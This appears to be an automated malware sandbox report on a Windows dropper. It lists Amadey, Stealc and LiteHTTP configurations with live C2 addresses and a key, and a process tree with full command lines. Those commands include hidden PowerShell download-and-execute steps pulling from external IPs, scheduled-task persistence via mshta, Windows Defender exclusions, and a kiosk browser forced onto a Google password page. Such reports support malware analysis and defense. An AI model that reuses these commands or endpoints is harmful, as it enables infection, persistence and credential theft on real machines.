Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/03/2025, 20:59

General

  • Target

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe

  • Size

    938KB

  • MD5

    1fa9c173c6abaae5709ca4b88db07aa5

  • SHA1

    dc77a5b0aeede04510ad4604ff58af13fd377609

  • SHA256

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247

  • SHA512

    8bf7ea16e4ac88460842de1ab9abeeccb930d1bd309a8d06e2e33fab96cdd8a6f7a001dede7eedbe3511cba20e8799591e45a1a00bb484899bc255f3af811534

  • SSDEEP

    24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:OTvC/MTQYxsWR7a09

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer, an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 22 IoCs
  • .NET Reactor protector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe
    "C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2244
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 87tdHmaX0nr /tr "mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2540
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\15M4G5FNd.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2332
        • C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE
          "C:\Users\Admin\AppData\Local\TempNFPIDTXFHRMGEA6SQNQNMFP3CKEWIZM2.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2020
            • C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe
              "C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3016
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1040
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2540
            • C:\Users\Admin\AppData\Local\Temp\10106670101\51f7b9b684.exe
              "C:\Users\Admin\AppData\Local\Temp\10106670101\51f7b9b684.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1864
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn tSBw5maorbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:628
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn tSBw5maorbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:836
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\uTSWxz0Yk.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2192
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2524
                  • C:\Users\Admin\AppData\Local\TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE
                    "C:\Users\Admin\AppData\Local\TempVS6JYJDFRACRGUYZTVLNFKEJPHBBMRWW.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1300
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1508
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2056
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2996
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2896
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2876
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2868
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2332
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2648
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "QB8c5maXb3p" /tr "mshta \"C:\Temp\jVnN29abX.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2780
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\jVnN29abX.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2668
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2684
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:548
            • C:\Users\Admin\AppData\Local\Temp\10106720101\7ece595e42.exe
              "C:\Users\Admin\AppData\Local\Temp\10106720101\7ece595e42.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2736
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2244
            • C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe
              "C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2328
              • C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe
                "C:\Users\Admin\AppData\Local\Temp\10106730101\d20f842ca5.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1272
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 1020
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:340
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 508
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2596
            • C:\Users\Admin\AppData\Local\Temp\10106740101\aa693c20c2.exe
              "C:\Users\Admin\AppData\Local\Temp\10106740101\aa693c20c2.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • System Location Discovery: System Language Discovery
              PID:2956
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2548
            • C:\Users\Admin\AppData\Local\Temp\10106750101\eba65d1d30.exe
              "C:\Users\Admin\AppData\Local\Temp\10106750101\eba65d1d30.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:1740
            • C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
              "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
              6⤵
              • Executes dropped EXE
              PID:1004
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC6C.tmp\BC6D.tmp\BC6E.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
                7⤵
                PID:836
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1700
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1576
            • C:\Users\Admin\AppData\Local\Temp\10106780101\f831ef21a9.exe
              "C:\Users\Admin\AppData\Local\Temp\10106780101\f831ef21a9.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2624
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1616
            • C:\Users\Admin\AppData\Local\Temp\10106790101\eeea2c0482.exe
              "C:\Users\Admin\AppData\Local\Temp\10106790101\eeea2c0482.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1064
            • C:\Users\Admin\AppData\Local\Temp\10106800101\7093c1f919.exe
              "C:\Users\Admin\AppData\Local\Temp\10106800101\7093c1f919.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1032
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1052
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1504
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3044
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1916
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1936
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                PID:2224
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  8⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:636
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.0.1060569481\647303324" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1200 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {aed649f7-cf73-4852-b31f-71412d67fa40} 636 "\\.\pipe\gecko-crash-server-pipe.636" 1284 46ef558 gpu
                    9⤵
                    PID:2432
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.1.1273430422\1444582335" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e66fd8c-be6d-4fa3-acd3-04c4b5ec5408} 636 "\\.\pipe\gecko-crash-server-pipe.636" 1488 d71258 socket
                    9⤵
                    PID:1564
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.2.469860085\326288266" -childID 1 -isForBrowser -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26186f5e-302b-4746-a497-87e9b3f9c082} 636 "\\.\pipe\gecko-crash-server-pipe.636" 2076 19d8d658 tab
                    9⤵
                    PID:2912
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.3.1831267843\1460391090" -childID 2 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6f16a3e-f87a-44ce-b795-577abc62883c} 636 "\\.\pipe\gecko-crash-server-pipe.636" 2952 d63658 tab
                    9⤵
                    PID:2876
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.4.1585189884\863238637" -childID 3 -isForBrowser -prefsHandle 3444 -prefMapHandle 3440 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b182073-c45d-4670-a920-c085b7090e23} 636 "\\.\pipe\gecko-crash-server-pipe.636" 3696 1f63e958 tab
                    9⤵
                    PID:2748
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.5.384292402\1804995797" -childID 4 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5531b395-033d-426e-b3de-7e2bd62d25ed} 636 "\\.\pipe\gecko-crash-server-pipe.636" 3812 1f63d758 tab
                    9⤵
                    PID:996
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="636.6.1086096048\760004681" -childID 5 -isForBrowser -prefsHandle 4024 -prefMapHandle 4028 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 860 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9933e924-53f0-4c41-a534-010b0901e13f} 636 "\\.\pipe\gecko-crash-server-pipe.636" 4012 1f63f558 tab
                    9⤵
                    PID:2276
            • C:\Users\Admin\AppData\Local\Temp\10106810101\e45f20b736.exe
              "C:\Users\Admin\AppData\Local\Temp\10106810101\e45f20b736.exe"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1780
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106821121\PcAIvJ0.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3196
            • C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe
              "C:\Users\Admin\AppData\Local\Temp\10106830101\v6Oqdnc.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3324
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 1204
                                  7⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:3500
                              • C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3620
                                • C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106840101\MCxU5Fj.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:3656
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 1020
                                    8⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:3784
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 504
                                  7⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:3712
                              • C:\Users\Admin\AppData\Local\Temp\10106850101\ce4pMzk.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106850101\ce4pMzk.exe"
                                6⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3848
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\zuuBU1dU\Anubis.exe""
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:3176
                              • C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"
                                6⤵
                                • Executes dropped EXE
